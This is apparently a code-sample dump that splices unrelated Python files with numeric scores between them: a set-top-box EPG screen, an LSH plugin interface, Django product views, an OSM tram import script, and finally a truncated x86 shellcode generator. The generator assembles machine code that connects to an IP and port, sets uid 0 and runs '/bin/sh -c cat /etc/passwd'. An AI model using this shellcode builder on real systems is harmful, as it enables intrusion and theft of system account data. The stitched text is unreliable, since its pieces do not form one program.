Button(_('+24')) elif config.epgselection.graph_red.value == "24minus": self['key_red'] = Button(_('-24')) elif config.epgselection.graph_red.value == "timer": self['key_red'] = Button(_('Add Timer')) elif config.epgselection.graph_red.value == "imdb" or config.epgselection.graph_red.value == None : self['key_red'] = Button(_('IMDb Search')) elif config.epgselection.graph_red.value == "autotimer": self['key_red'] = Button(_('Add AutoTimer')) elif config.epgselection.graph_red.value == "bouquetlist": self['key_red'] = Button(_('BouquetList')) elif config.epgselection.graph_red.value == "epgsearch": self['key_red'] = Button(_('EPG Search')) elif config.epgselection.graph_red.value == "showmovies": self['key_red'] = Button(_('Recordings')) elif config.epgselection.graph_red.value == "record": self['key_red'] = Button(_('Record')) elif config.epgselection.graph_red.value == "gotodatetime": self['key_red'] = Button(_('Goto Date/Time')) elif config.epgselection.graph_red.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self['key_red'] = Button(_('Next page')) elif config.epgselection.graph_red.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self['key_red'] = Button(_('Previous page')) elif config.epgselection.graph_red.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self['key_red'] = Button(_('Next bouquet')) elif config.epgselection.graph_red.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self['key_red'] = Button(_('Previous bouquet')) if config.epgselection.graph_green.value == "24plus": self['key_green'] = Button(_('+24')) elif config.epgselection.graph_green.value == "24minus": self['key_green'] = Button(_('-24')) elif config.epgselection.graph_green.value == "timer" or config.epgselection.graph_green.value == None : self['key_green'] = Button(_('Add Timer')) elif config.epgselection.graph_green.value == "imdb": self['key_green'] = Button(_('IMDb Search')) elif config.epgselection.graph_green.value == "autotimer": self['key_green'] = Button(_('Add AutoTimer')) elif config.epgselection.graph_green.value == "bouquetlist": self['key_green'] = Button(_('BouquetList')) elif config.epgselection.graph_green.value == "epgsearch": self['key_green'] = Button(_('EPG Search')) elif config.epgselection.graph_green.value == "showmovies": self['key_green'] = Button(_('Recordings')) elif config.epgselection.graph_green.value == "record": self['key_green'] = Button(_('Record')) elif config.epgselection.graph_green.value == "gotodatetime": self['key_green'] = Button(_('Goto Date/Time')) elif config.epgselection.graph_green.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self['key_green'] = Button(_('Next page')) elif config.epgselection.graph_green.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self['key_green'] = Button(_('Previous page')) elif config.epgselection.graph_green.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self['key_green'] = Button(_('Next bouquet')) elif config.epgselection.graph_green.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self['key_green'] = Button(_('Previous bouquet')) if config.epgselection.graph_yellow.value == "24plus": self['key_yellow'] = Button(_('+24')) elif config.epgselection.graph_yellow.value == "24minus": self['key_yellow'] = Button(_('-24')) elif config.epgselection.graph_yellow.value == "timer": self['key_yellow'] = Button(_('Add Timer')) elif config.epgselection.graph_yellow.value == "imdb": self['key_yellow'] = Button(_('IMDb Search')) elif config.epgselection.graph_yellow.value == "autotimer": self['key_yellow'] = Button(_('Add AutoTimer')) elif config.epgselection.graph_yellow.value == "bouquetlist": self['key_yellow'] = Button(_('BouquetList')) elif config.epgselection.graph_yellow.value == "epgsearch" or config.epgselection.graph_yellow.value == None : self['key_yellow'] = Button(_('EPG Search')) elif config.epgselection.graph_yellow.value == "showmovies": self['key_yellow'] = Button(_('Recordings')) elif config.epgselection.graph_yellow.value == "record": self['key_yellow'] = Button(_('Record')) elif config.epgselection.graph_yellow.value == "gotodatetime": self['key_yellow'] = Button(_('Goto Date/Time')) elif config.epgselection.graph_yellow.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self['key_yellow'] = Button(_('Next page')) elif config.epgselection.graph_yellow.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self['key_yellow'] = Button(_('Previous page')) elif config.epgselection.graph_yellow.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self['key_yellow'] = Button(_('Next bouquet')) elif config.epgselection.graph_yellow.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self['key_yellow'] = Button(_('Previous bouquet')) if config.epgselection.graph_blue.value == "24plus": self['key_blue'] = Button(_('+24')) elif config.epgselection.graph_blue.value == "24minus": self['key_blue'] = Button(_('-24')) elif config.epgselection.graph_blue.value == "timer": self['key_blue'] = Button(_('Add Timer')) elif config.epgselection.graph_blue.value == "imdb": self['key_blue'] = Button(_('IMDb Search')) elif config.epgselection.graph_blue.value == "autotimer" or config.epgselection.graph_blue.value == None : self['key_blue'] = Button(_('Add AutoTimer')) elif config.epgselection.graph_blue.value == "bouquetlist": self['key_blue'] = Button(_('BouquetList')) elif config.epgselection.graph_blue.value == "epgsearch": self['key_blue'] = Button(_('EPG Search')) elif config.epgselection.graph_blue.value == "showmovies": self['key_blue'] = Button(_('Recordings')) elif config.epgselection.graph_blue.value == "record": self['key_blue'] = Button(_('Record')) elif config.epgselection.graph_blue.value == "gotodatetime": self['key_blue'] = Button(_('Goto Date/Time')) elif config.epgselection.graph_blue.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self['key_blue'] = Button(_('Next page')) elif config.epgselection.graph_blue.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self['key_blue'] = Button(_('Previous page')) elif config.epgselection.graph_blue.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self['key_blue'] = Button(_('Next bouquet')) elif config.epgselection.graph_blue.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self['key_blue'] = Button(_('Previous bouquet')) elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_red.value == "24plus": self['key_red'] = Button(_('+24')) elif config.epgselection.vertical_red.value == "24minus": self['key_red'] = Button(_('-24')) elif config.epgselection.vertical_red.value == "timer": self['key_red'] = Button(_('Add Timer')) elif config.epgselection.vertical_red.value == "imdb" or config.epgselection.vertical_red.value == None : self['key_red'] = Button(_('IMDb Search')) elif config.epgselection.vertical_red.value == "autotimer": self['key_red'] = Button(_('Add AutoTimer')) elif config.epgselection.vertical_red.value == "bouquetlist": self['key_red'] = Button(_('BouquetList')) elif config.epgselection.vertical_red.value == "epgsearch": self['key_red'] = Button(_('EPG Search')) elif config.epgselection.vertical_red.value == "showmovies": self['key_red'] = Button(_('Recordings')) elif config.epgselection.vertical_red.value == "record": self['key_red'] = Button(_('Record')) elif config.epgselection.vertical_red.value == "gotoprimetime": self['key_red'] = Button(_('Goto Primetime')) elif config.epgselection.vertical_red.value == "setbasetime": self['key_red'] = Button(_('Set Basetime')) elif config.epgselection.vertical_red.value == "gotodatetime": self['key_red'] = Button(_('Goto Date/Time')) if config.epgselection.vertical_green.value == "24plus": self['key_green'] = Button(_('+24')) elif config.epgselection.vertical_green.value == "24minus": self['key_green'] = Button(_('-24')) elif config.epgselection.vertical_green.value == "timer" or config.epgselection.vertical_green.value == None : self['key_green'] = Button(_('Add Timer')) elif config.epgselection.vertical_green.value == "imdb": self['key_green'] = Button(_('IMDb Search')) elif config.epgselection.vertical_green.value == "autotimer": self['key_green'] = Button(_('Add AutoTimer')) elif config.epgselection.vertical_green.value == "bouquetlist": self['key_green'] = Button(_('BouquetList')) elif config.epgselection.vertical_green.value == "epgsearch": self['key_green'] = Button(_('EPG Search')) elif config.epgselection.vertical_green.value == "showmovies": self['key_green'] = Button(_('Recordings')) elif config.epgselection.vertical_green.value == "record": self['key_green'] = Button(_('Record')) elif config.epgselection.vertical_green.value == "gotoprimetime": self['key_green'] = Button(_('Goto Primetime')) elif config.epgselection.vertical_green.value == "setbasetime": self['key_green'] = Button(_('Set Basetime')) elif config.epgselection.vertical_green.value == "gotodatetime": self['key_green'] = Button(_('Goto Date/Time')) if config.epgselection.vertical_yellow.value == "24plus": self['key_yellow'] = Button(_('+24')) elif config.epgselection.vertical_yellow.value == "24minus": self['key_yellow'] = Button(_('-24')) elif config.epgselection.vertical_yellow.value == "timer": self['key_yellow'] = Button(_('Add Timer')) elif config.epgselection.vertical_yellow.value == "imdb": self['key_yellow'] = Button(_('IMDb Search')) elif config.epgselection.vertical_yellow.value == "autotimer": self['key_yellow'] = Button(_('Add AutoTimer')) elif config.epgselection.vertical_yellow.value == "bouquetlist": self['key_yellow'] = Button(_('BouquetList')) elif config.epgselection.vertical_yellow.value == "epgsearch" or config.epgselection.vertical_yellow.value == None : self['key_yellow'] = Button(_('EPG Search')) elif config.epgselection.vertical_yellow.value == "showmovies": self['key_yellow'] = Button(_('Recordings')) elif config.epgselection.vertical_yellow.value == "record": self['key_yellow'] = Button(_('Record')) elif config.epgselection.vertical_yellow.value == "gotoprimetime": self['key_yellow'] = Button(_('Goto Primetime')) elif config.epgselection.vertical_yellow.value == "setbasetime": self['key_yellow'] = Button(_('Set Basetime')) elif config.epgselection.vertical_yellow.value == "gotodatetime": self['key_yellow'] = Button(_('Goto Date/Time')) if config.epgselection.vertical_blue.value == "24plus": self['key_blue'] = Button(_('+24')) elif config.epgselection.vertical_blue.value == "24minus": self['key_blue'] = Button(_('-24')) elif config.epgselection.vertical_blue.value == "timer": self['key_blue'] = Button(_('Add Timer')) elif config.epgselection.vertical_blue.value == "imdb": self['key_blue'] = Button(_('IMDb Search')) elif config.epgselection.vertical_blue.value == "autotimer" or config.epgselection.vertical_blue.value == None : self['key_blue'] = Button(_('Add AutoTimer')) elif config.epgselection.vertical_blue.value == "bouquetlist": self['key_blue'] = Button(_('BouquetList')) elif config.epgselection.vertical_blue.value == "epgsearch": self['key_blue'] = Button(_('EPG Search')) elif config.epgselection.vertical_blue.value == "showmovies": self['key_blue'] = Button(_('Recordings')) elif config.epgselection.vertical_blue.value == "record": self['key_blue'] = Button(_('Record')) elif config.epgselection.vertical_blue.value == "gotoprimetime": self['key_blue'] = Button(_('Goto Primetime')) elif config.epgselection.vertical_blue.value == "setbasetime": self['key_blue'] = Button(_('Set Basetime')) elif config.epgselection.vertical_blue.value == "gotodatetime": self['key_blue'] = Button(_('Goto Date/Time')) def setTimerButtonText(self, text = None): if text == None: text = _("Add Timer") if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if config.epgselection.graph_red.value == 'timer': self["key_red"].setText(text) if config.epgselection.graph_green.value == 'timer': self["key_green"].setText(text) if config.epgselection.graph_yellow.value == 'timer': self["key_yellow"].setText(text) if config.epgselection.graph_blue.value == 'timer': self["key_blue"].setText(text) elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_red.value == 'timer': self["key_red"].setText(text) if config.epgselection.vertical_green.value == 'timer': self["key_green"].setText(text) if config.epgselection.vertical_yellow.value == 'timer': self["key_yellow"].setText(text) if config.epgselection.vertical_blue.value == 'timer': self["key_blue"].setText(text) else: self['key_green'].setText(text) def getChannels(self): self.list = [] self.myServices = [] idx = 0 for service in self.services: idx = idx + 1 info = service.info() servicename = info.getName(service.ref).replace('\xc2\x86', '').replace('\xc2\x87', '') self.list.append(str(idx) + ". " + servicename) self.myServices.append((service.ref.toString(), servicename)) if not idx: self.list.append('') self.myServices.append(('', '')) return self.list def updateVerticalEPG(self, force = False): self.displayActiveEPG() stime = None now = time() if force or self.ask_time >= now - config.epg.histminutes.value*60: stime = self.ask_time prgIndex = self["list"].getSelectionIndex() CurrentPrg = self.myServices[prgIndex] x = len(self.list)-1 if x >= 0 and CurrentPrg[0]: self["list1"].show() self["currCh1"].setText(str(CurrentPrg[1])) l = self["list1"] l.recalcEntrySize() myService = ServiceReference(CurrentPrg[0]) self["piconCh1"].newService(myService.ref) l.fillSingleEPG(myService, stime) else: self["Active1"].hide() self["piconCh1"].newService(None) self["currCh1"].setText(str(" ")) self["list1"].hide() prgIndex = prgIndex + 1 if prgIndex < (x+1): self["list2"].show() CurrentPrg = self.myServices[prgIndex] self["currCh2"].setText(str(CurrentPrg[1])) l = self["list2"] l.recalcEntrySize() myService = ServiceReference(CurrentPrg[0]) self["piconCh2"].newService(myService.ref) l.fillSingleEPG(myService, stime) else: self["piconCh2"].newService(None) self["currCh2"].setText(str(" ")) self["list2"].hide() prgIndex = prgIndex + 1 if prgIndex < (x+1): self["list3"].show() CurrentPrg = self.myServices[prgIndex] self["currCh3"].setText(str(CurrentPrg[1])) l = self["list3"] l.recalcEntrySize() myService = ServiceReference(CurrentPrg[0]) self["piconCh3"].newService(myService.ref) l.fillSingleEPG(myService, stime) else: self["piconCh3"].newService(None) self["currCh3"].setText(str(" ")) self["list3"].hide() if self.Fields == 6: prgIndex = prgIndex + 1 if prgIndex < (x+1): self["list4"].show() CurrentPrg = self.myServices[prgIndex] self["currCh4"].setText(str(CurrentPrg[1])) l = self["list4"] l.recalcEntrySize() myService = ServiceReference(CurrentPrg[0]) self["piconCh4"].newService(myService.ref) l.fillSingleEPG(myService, stime) else: self["piconCh4"].newService(None) self["currCh4"].setText(str(" ")) self["piconCh4"].newService(None) self["list4"].hide() prgIndex = prgIndex + 1 if prgIndex < (x+1): self["list5"].show() CurrentPrg = self.myServices[prgIndex] self["currCh5"].setText(str(CurrentPrg[1])) l = self["list5"] l.recalcEntrySize() myService = ServiceReference(CurrentPrg[0]) self["piconCh5"].newService(myService.ref) l.fillSingleEPG(myService, stime) else: self["piconCh5"].newService(None) self["currCh5"].setText(str(" ")) self["list5"].hide() else: self["currCh4"].setText(str(" ")) self["list4"].hide() self["Active4"].hide() self["currCh5"].setText(str(" ")) self["list5"].hide() self["Active5"].hide() def displayActiveEPG(self): marker = config.epgselection.vertical_eventmarker.value for list in range(1, self.Fields): if list == self.activeList: self["list"+str(list)].selectionEnabled(True) self["Active"+str(list)].show() else: self["Active"+str(list)].hide() self["list"+str(list)].selectionEnabled(marker) def getActivePrg(self): return self["list"].getSelectionIndex()+(self.activeList-1) def allUp(self): if self.getEventTime(self.activeList)[0] is None: return idx = self['list'+str(self.activeList)].getCurrentIndex() if not idx: tmp = self.lastEventTime self.setMinus24h(True, 6) self.lastEventTime = tmp self.gotoLasttime() for list in range(1, self.Fields): self['list'+str(list)].moveTo(self['list'+str(list)].instance.pageUp) self.syncUp(idx) self.saveLastEventTime() def syncUp(self, idx): idx = self['list'+str(self.activeList)].getCurrentIndex() curTime = self.getEventTime(self.activeList)[0] for list in range(1, self.Fields): if list == self.activeList: continue for x in range(0, int(idx/config.epgselection.vertical_itemsperpage.value)): evTime = self.getEventTime(list)[0] if curTime is None or evTime is None or curTime <= evTime: self['list'+str(list)].moveTo(self['list'+str(list)].instance.pageUp) evTime = self.getEventTime(list)[0] if curTime is None or evTime is None or curTime >= evTime: break def syncDown(self, idx): curTime = self.getEventTime(self.activeList)[0] for list in range(1, self.Fields): if list == self.activeList: continue for x in range(0, int(idx/config.epgselection.vertical_itemsperpage.value)): evTime = self.getEventTime(list)[0] if curTime is None or evTime is None or curTime >= evTime: self['list'+str(list)].moveTo(self['list'+str(list)].instance.pageDown) evTime = self.getEventTime(list)[0] if curTime is None or evTime is None or curTime <= evTime: break def allDown(self): if self.getEventTime(self.activeList)[0] is None: return for list in range(1, self.Fields): self['list'+str(list)].moveTo(self['list'+str(list)].instance.pageDown) idx = self['list'+str(self.activeList)].getCurrentIndex() self.syncDown(idx) self.saveLastEventTime() def gotoNow(self): self.ask_time = time() self.updateVerticalEPG() self.saveLastEventTime() def gotoFirst(self): self["list"].moveToIndex(0) self.activeList = 1 self.updateVerticalEPG() def gotoLast(self): idx = len(self.list) page = idx/(self.Fields-1) row = idx%(self.Fields-1) if row: self.activeList = row else: page-=1 self.activeList = self.Fields-1 self["list"].moveToIndex(0) for i in range(0, page): self["list"].pageDown() self.updateVerticalEPG() def setPrimetime(self, stime): if stime is None: stime = time() t = localtime(stime) primetime = mktime((t[0], t[1], t[2], config.epgselection.vertical_primetimehour.value, config.epgselection.vertical_primetimemins.value, 0, t[6], t[7], t[8])) return primetime def findMaxEventTime(self, stime): curr = self['list'+str(self.activeList)].getSelectedEventId() self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveEnd) maxtime = self.getEventTime(self.activeList)[0] self['list'+str(self.activeList)].moveToEventId(curr) return maxtime is not None and maxtime >= stime def findMinEventTime(self, stime): curr = self['list'+str(self.activeList)].getSelectedEventId() self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveTop) mintime = self.getEventTime(self.activeList)[0] self['list'+str(self.activeList)].moveToEventId(curr) return mintime is not None and mintime <= stime def isInTimeRange(self, stime): return self.findMaxEventTime(stime) and self.findMinEventTime(stime) def setPlus24h(self): oneDay = 24*3600 ev_begin, ev_end = self.getEventTime(self.activeList) if ev_begin is not None: if self.findMaxEventTime(ev_begin+oneDay): primetime = self.setPrimetime(ev_begin) if primetime >= ev_begin and primetime < ev_end: self.ask_time = primetime + oneDay else: self.ask_time = ev_begin + oneDay self.updateVerticalEPG() else: self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveEnd) self.saveLastEventTime() def setMinus24h(self, force = False, daypart = 1): now = time() oneDay = 24*3600/daypart if not self.lastMinus: self.lastMinus = oneDay ev_begin, ev_end = self.getEventTime(self.activeList) if ev_begin is not None: if ev_begin - oneDay < now: self.ask_time = -1 else: if self['list'+str(self.activeList)].getCurrentIndex() and not force and self.findMinEventTime(ev_begin - oneDay): self.lastEventTime = ev_begin - oneDay, ev_end - oneDay self.gotoLasttime() return else: pt = 0 if self.ask_time == ev_begin - self.lastMinus: self.lastMinus += self.lastMinus else: primetime = self.setPrimetime(ev_begin) if primetime >= ev_begin and primetime < ev_end: self.ask_time = pt = primetime - oneDay self.lastMinus = oneDay if not pt: self.ask_time = ev_begin - self.lastMinus self.updateVerticalEPG() self.saveLastEventTime() def setBasetime(self): ev_begin, ev_end = self.getEventTime(self.activeList) if ev_begin is not None: self.ask_time = ev_begin self.updateVerticalEPG() def gotoPrimetime(self): idx = 0 now = time() oneDay = 24*3600 if self.firststart: self.ask_time = self.setPrimetime(now) self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveTop) ev_begin = self.getEventTime(self.activeList)[0] if ev_begin is not None and ev_begin > self.ask_time: self.ask_time += oneDay self.updateVerticalEPG() self.saveLastEventTime() return ev_begin, ev_end = self.getEventTime(self.activeList) if ev_begin is None: return for list in range(1, self.Fields): idx += self['list'+str(list)].getCurrentIndex() primetime = self.setPrimetime(ev_begin) onlyPT = False #key press primetime always sync gotoNow = False #False -> -24h List expanded, True -> got to current event and sync (onlyPT must set to False!) rPM = self.isInTimeRange(primetime-oneDay) rPT = self.isInTimeRange(primetime) rPP = self.isInTimeRange(primetime+oneDay) if rPM or rPT or rPP: if onlyPT or idx or not (primetime >= ev_begin and primetime < ev_end): #not sync or not primetime: if rPT: self.ask_time = primetime elif rPP: self.ask_time = primetime + oneDay elif rPM: self.ask_time = primetime - oneDay self.updateVerticalEPG(True) else: if gotoNow: self.gotoNow() return else: self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveTop) self.setMinus24h(True, 6) for list in range(1, self.Fields): self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveEnd) cnt = self['list'+str(list)].getCurrentIndex() self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveTop) self.findPrimetime(cnt, list, primetime) self.saveLastEventTime() def gotoLasttime(self, list = 0): if list: self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveEnd) cnt = self['list'+str(list)].getCurrentIndex() self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveTop) self.findLasttime(cnt, list) else: for list in range(1, self.Fields): self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveEnd) cnt = self['list'+str(list)].getCurrentIndex() self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveTop) self.findLasttime(cnt, list) def findLasttime(self, cnt, list, idx = 0): last_begin, last_end = self.lastEventTime for events in range(0, idx): self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveDown) for events in range(idx, cnt): ev_begin, ev_end = self.getEventTime(list) if ev_begin is not None: if (ev_begin <= last_begin and ev_end > last_begin) or (ev_end >= last_end): break self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveDown) else: break def findPrimetime(self, cnt, list, primetime): for events in range(0, cnt): ev_begin, ev_end = self.getEventTime(list) if ev_begin is not None: if (primetime >= ev_begin and primetime < ev_end): break self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveDown) else: break def saveLastEventTime(self, list = 0): if not list: list = self.activeList now = time() last = self.lastEventTime self.lastEventTime = self.getEventTime(list) if self.lastEventTime[0] is None and last[0] is not None: self.lastEventTime = last elif last[0] is None: self.lastEventTime = (now, now+3600) def getEventTime(self, list): tmp = self['list'+str(list)].l.getCurrentSelection() if tmp is None: return None, None return tmp[2], tmp[2]+tmp[3] #event begin, event end class SingleEPG(EPGSelection): def __init__(self, session, service, EPGtype="single"): EPGSelection.__init__(self, session, service=service, EPGtype=EPGtype) self.skinName = 'EPGSelection'
0.026297
""" Interface and plugin getter for LSH algorithm hash generation functors. """ import abc import os from smqtk.algorithms import SmqtkAlgorithm from smqtk.utils import plugin __author__ = "paul.tunison@kitware.com" class LshFunctor (SmqtkAlgorithm): """ Locality-sensitive hashing functor interface. The aim of such a function is to be able to generate hash codes (bit-vectors) such that similar items map to the same or similar hashes with a high probability. In other words, it aims to maximize hash collision for similar items. **Building Models** Some hash functions want to build a model based on some training set of descriptors. Due to the non-standard nature of algorithm training and model building, please refer to the specific implementation for further information on whether model training is needed and how it is accomplished. """ @abc.abstractmethod def get_hash(self, descriptor): """ Get the locality-sensitive hash code for the input descriptor. :param descriptor: Descriptor vector we should generate the hash of. :type descriptor: numpy.ndarray[float] :return: Generated bit-vector as a numpy array of booleans. :rtype: numpy.ndarray[bool] """ def get_lsh_functor_impls(reload_modules=False): """ Discover and return discovered ``LshFunctor`` classes. Keys in the returned map are the names of the discovered classes, and the paired values are the actual class type objects. We search for implementation classes in: - modules next to this file this function is defined in (ones that begin with an alphanumeric character), - python modules listed in the environment variable :envvar:`LSH_FUNCTOR_PATH` - This variable should contain a sequence of python module specifications, separated by the platform specific PATH separator character (``;`` for Windows, ``:`` for unix) Within a module we first look for a helper variable by the name ``LSH_FUNCTOR_CLASS``, which can either be a single class object or an iterable of class objects, to be specifically exported. If the variable is set to None, we skip that module and do not import anything. If the variable is not present, we look at attributes defined in that module for classes that descend from the given base class type. If none of the above are found, or if an exception occurs, the module is skipped. :param reload_modules: Explicitly reload discovered modules from source. :type reload_modules: bool :return: Map of discovered class object of type :class:`.LshFunctor` whose keys are the string names of the classes. :rtype: dict[str, type] """ this_dir = os.path.abspath(os.path.dirname(__file__)) env_var = "LSH_FUNCTOR_PATH" helper_var = "LSH_FUNCTOR_CLASS" return plugin.get_plugins(__name__, this_dir, env_var, helper_var, LshFunctor, reload_modules=reload_modules)
0
import json from django.http import HttpResponse from django.shortcuts import get_object_or_404, render from mobility.decorators import mobile_template from kitsune.products.models import Product, Topic from kitsune.wiki.facets import topics_for, documents_for @mobile_template('products/{mobile/}products.html') def product_list(request, template): """The product picker page.""" products = Product.objects.filter(visible=True) return render(request, template, { 'products': products}) @mobile_template('products/{mobile/}product.html') def product_landing(request, template, slug): """The product landing page.""" product = get_object_or_404(Product, slug=slug) if request.is_ajax(): # Return a list of topics/subtopics for the product topic_list = list() for t in Topic.objects.filter(product=product, visible=True): topic_list.append({'id': t.id, 'title': t.title}) return HttpResponse(json.dumps({'topics': topic_list}), mimetype='application/json') versions = product.versions.filter(default=True) if versions: latest_version = versions[0].min_version else: latest_version = 0 return render(request, template, { 'product': product, 'products': Product.objects.filter(visible=True), 'topics': topics_for(products=[product], parent=None), 'search_params': {'product': slug}, 'latest_version': latest_version }) @mobile_template('products/{mobile/}documents.html') def document_listing(request, template, product_slug, topic_slug, subtopic_slug=None): """The document listing page for a product + topic.""" product = get_object_or_404(Product, slug=product_slug) topic = get_object_or_404(Topic, slug=topic_slug, product=product, parent__isnull=True) doc_kw = {'locale': request.LANGUAGE_CODE, 'products': [product]} if subtopic_slug is not None: subtopic = get_object_or_404(Topic, slug=subtopic_slug, product=product, parent=topic) doc_kw['topics'] = [subtopic] else: subtopic = None doc_kw['topics'] = [topic] documents, fallback_documents = documents_for(**doc_kw) return render(request, template, { 'product': product, 'topic': topic, 'subtopic': subtopic, 'topics': topics_for(products=[product], parent=None), 'subtopics': topics_for(products=[product], parent=topic), 'documents': documents, 'fallback_documents': fallback_documents, 'search_params': {'product': product_slug}})
0
#!/usr/bin/python # -*- coding: utf8 -*- import os import psycopg2 import time import config import argparse def download_osm(): import urllib urllib.urlretrieve ('''http://overpass.osm.rambler.ru/cgi/interpreter?data=[timeout:86400];relation["route"="tram"](55.67,23.12,57.59,27.88);(._;>;);out meta;''', "data.osm") def argparser_prepare(): class PrettyFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter): max_help_position = 35 parser = argparse.ArgumentParser(description='', formatter_class=PrettyFormatter) parser.add_argument('--download', dest='download', action='store_true') parser.add_argument('--no-download', dest='download', action='store_false') parser.set_defaults(download=True) parser.epilog = \ '''Samples: %(prog)s --download %(prog)s --no-download ''' \ % {'prog': parser.prog} return parser def cleardb(host,dbname,user,password): ConnectionString="dbname=" + dbname + " user="+ user + " host=" + host + " password=" + password try: conn = psycopg2.connect(ConnectionString) except: print 'I am unable to connect to the database ' print ConnectionString return 0 cur = conn.cursor() sql =''' DROP TABLE IF EXISTS planet_osm_buildings CASCADE; DROP TABLE IF EXISTS planet_osm_line CASCADE; DROP TABLE IF EXISTS planet_osm_nodes CASCADE; DROP TABLE IF EXISTS planet_osm_point CASCADE; DROP TABLE IF EXISTS planet_osm_polygon CASCADE; DROP TABLE IF EXISTS planet_osm_rels CASCADE; DROP TABLE IF EXISTS planet_osm_roads CASCADE; DROP TABLE IF EXISTS planet_osm_ways CASCADE; DROP TABLE IF EXISTS route_line_labels CASCADE; DROP TABLE IF EXISTS routes_with_refs CASCADE; DROP TABLE IF EXISTS terminals CASCADE; DROP TABLE IF EXISTS terminals_export CASCADE; ''' cur.execute(sql) conn.commit() def importdb(host,dbname,user,password): os.system(''' osm2pgsql --create --slim -E 3857 --database '''+dbname+''' --username '''+user+''' data.osm ''') def process(host,dbname,user,password): cmd='''python ../../osmot.py -hs localhost -d '''+dbname+''' -u '''+user+''' -p '''+password+''' ''' print cmd os.system(cmd) def postgis2geojson(host,dbname,user,password,table): os.system(''' ogr2ogr -f GeoJSON '''+table+'''.geojson \ "PG:host='''+host+''' dbname='''+dbname+''' user='''+user+''' password='''+password+'''" "'''+table+'''" ''') if __name__ == '__main__': host=config.host dbname=config.dbname user=config.user password=config.password parser = argparser_prepare() args = parser.parse_args() is_download = args.download if is_download == True: print "downloading" download_osm() cleardb(host,dbname,user,password) importdb(host,dbname,user,password) process(host,dbname,user,password) postgis2geojson(host,dbname,user,password,'terminals_export') postgis2geojson(host,dbname,user,password,'routes_with_refs')
0.03688
from struct import pack import sys import binascii ########################################################## # # 1. connect to IP:PORT # 2. Run binfile with paramters if given # # random 2014-04-21 ########################################################## ########################################################## des_format = 'shellcode: connect to %s:%s && %s %s' IP = '127.0.0.3' PORT = 5555 BIN_FILE = '/bin/sh' PARAMETERS = ['-c','cat /etc/passwd'] ALIGN = 4 UID = 0 ########################################################## def out_format(language): if language=='c': des = '\n\n/*\n* '+ des_format +'\n*/' elif language=='python': des = '\n\n# '+ des_format +' #' elif language=='perl': des = '\n\n# '+ des_format +' #' else: return print des % (IP,PORT,BIN_FILE,PARAMETERS) #padding FilePath with '/' by 4 bytes aligned def PaddingFilepath(binpath, align = ALIGN): newpath = '' sub_path = binpath.split('/') for p in sub_path: if len(p): newpath = newpath + (align - len(p) % align) * '/' + p return newpath def init_regs_shellcode(): shellcode = '' #init shellcode += '\x31\xc0\x31\xd2\x31\xdb\x31\xc9' #xor eax,eax#xor edx,edx#xor ebx,ebx#xor ecx,ecx return shellcode def build_sockaddr_shellcode(ip, port): ''' struct sockaddr { sa_family_t sa_family; char sa_data[14]; } ''' shellcode = '' shellcode += '\x31\xc0' #xor eax,eax shellcode += '\x50' #push eax shellcode += '\x50' #push eax if ip == '0.0.0.0': shellcode += '\x50' #push eax else: #push IP zero_arr = [0,0,0,0] ip_value = 0 ip = ip.split('.')[::-1] print ip for i in xrange(len(ip)): p = int(ip[i]) if p == 0: p = p + 1 zero_arr[i] = 1 ip_value += p <<8*(i) print ip_value #push ip shellcode += "\x68" #push shellcode += pack('>I',(ip_value)) #ip field for i in xrange(len(zero_arr)): if zero_arr[i] == 1: shellcode += '\xfe\x4c\x24' + pack('B',(i)) #dec byte [esp+i] #push port shellcode += '\x66\x68' #pushw shellcode += pack('>H',(port)) #ip field #host order is big endian shellcode += '\xb0\x02' #sa_family = AF_INET = 2 shellcode += '\x66\x50' #pushw %ax #shellcode += '\x89\xe0' #mov %esp,%eax return shellcode def setuid_shellcode(userid): shellcode = '' shellcode += '\x31\xc0' #xor eax,eax shellcode += '\x31\xdb' #xor ebx,ebx if (userid <= 0): pass elif (userid <= 0xff): shellcode += '\xb3' + pack('B',userid) #mov bl,UID elif (userid > 0xff): if not (userid & 0xFF): shellcode += '\x66\xbb' + pack('H',userid+1) #mov bx,(UID+1) shellcode += '\x66\x4b' #dec bx else: shellcode += '\x66\xbb' + pack('H',userid) #mov bx,(UID) shellcode += '\xb0\x17' #mov ax,0x17 shellcode += '\xcd\x80' #int 0x80 -----> setuid(UID) return shellcode def exec_shellcode(binpath,parameters): if len(binpath) % ALIGN : binpath = PaddingFilepath(binpath) strlen = len(binpath) cnt = strlen / ALIGN shellcode = '' #call execve(binpath,[binpath,arg1,arg2,...],NULL) shellcode += '\x31\xc0' #xor eax,eax shellcode += '\x31\xd2\x52' #xor edx,edx#push edx ---> null bytes #push binpath binpath = binpath[::-1] #reverse str for i in 